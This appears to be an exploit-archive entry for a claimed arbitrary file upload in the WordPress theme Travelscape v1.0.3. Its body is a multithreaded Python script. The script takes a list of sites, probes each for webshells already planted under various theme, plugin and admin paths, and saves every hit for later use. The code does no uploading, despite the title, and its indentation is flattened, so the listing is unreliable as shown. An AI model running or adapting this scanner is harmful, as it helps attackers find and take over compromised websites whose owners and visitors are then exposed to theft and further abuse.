Wordpress theme travelscape v1.0.3 arbitrary file upload Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-04-08 | Type : webapps | Platform : php


[+] Code ...

# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys
import os.path
import requests
import re
import urllib3
from requests.exceptions import SSLError
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init
init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA
requests.urllib3.disable_warnings()
headers = {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;
wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107
Mobile Safari/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',

'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'Referer': 'www.google.com'
}
def URLdomain(url):
if url.startswith("http://"):
url = url.replace("http://", "")
elif url.startswith("https://"):
url = url.replace("https://", "")
if '/' in url:
url = url.split('/')[0]
return url
def check_security(url):
fg = success_color
fr = error_color
try:
url = 'http://' + URLdomain(url)
check = requests.get(url +
'/wp-content/themes/travelscape/json.php', headers=headers,
allow_redirects=True, timeout=15)
if 'MSQ_403' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/travelscape/json.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url +
'/wp-content/themes/aahana/json.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
if 'MSQ_403' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('MSQ_403.txt', 'a').write(url +
'/wp-content/themes/aahana/json.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
check = requests.get(url + '/wp-content/themes/travel/issue.php',
headers=headers, allow_redirects=True, timeout=15)
if 'Yanz Webshell!' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url +
'/wp-content/themes/travel/issue.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url + '/about.php', headers=headers,
allow_redirects=True, timeout=15)
if 'Yanz Webshell!' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '/about.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url +
'/wp-content/themes/digital-download/new.php', headers=headers,
allow_redirects=True, timeout=15)
if '#0x2525' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('digital-download.txt', 'a').write(url +
'/wp-content/themes/digital-download/new.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
url = 'http://' + URLdomain(url)
check = requests.get(url + '/epinyins.php', headers=headers,
allow_redirects=True, timeout=15)
if 'Uname:' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '/epinyins.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
url = 'https://' + URLdomain(url)
check = requests.get(url + '/wp-admin/dropdown.php',
headers=headers, allow_redirects=True, verify=False, timeout=15)
if 'Uname:' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url +
'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,
allow_redirects=True, verify=False, timeout=15)
if 'Simple Shell' in check.text:
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
open('dummyyummy.txt', 'a').write(url +
'/wp-content/plugins/dummyyummy/wp-signup.php\n')
else:
print(' -| ' + url + ' --> {}[Failed]'.format(fr))
except Exception as e:
print(f' -| {url} --> {fr}[Failed] due to: {e}')
def main():
try:
url_file_path = sys.argv[1]
except IndexError:
url_file_path = input(f"{info_color}Enter the path to the file
containing URLs: ")
if not os.path.isfile(url_file_path):
print(f"{error_color}[ERROR] The specified file path is
invalid.")
sys.exit(1)
try:
urls_to_check = [line.strip() for line in open(url_file_path, 'r',
encoding='utf-8').readlines()]
except Exception as e:
print(f"{error_color}[ERROR] An error occurred while reading the
file: {e}")
sys.exit(1)
pool = ThreadPool(20)
pool.map(check_security, urls_to_check)
pool.close()
pool.join()
print(f"{info_color}Security check process completed successfully.
Results are saved in corresponding files.")
if __name__ == "__main__":
main()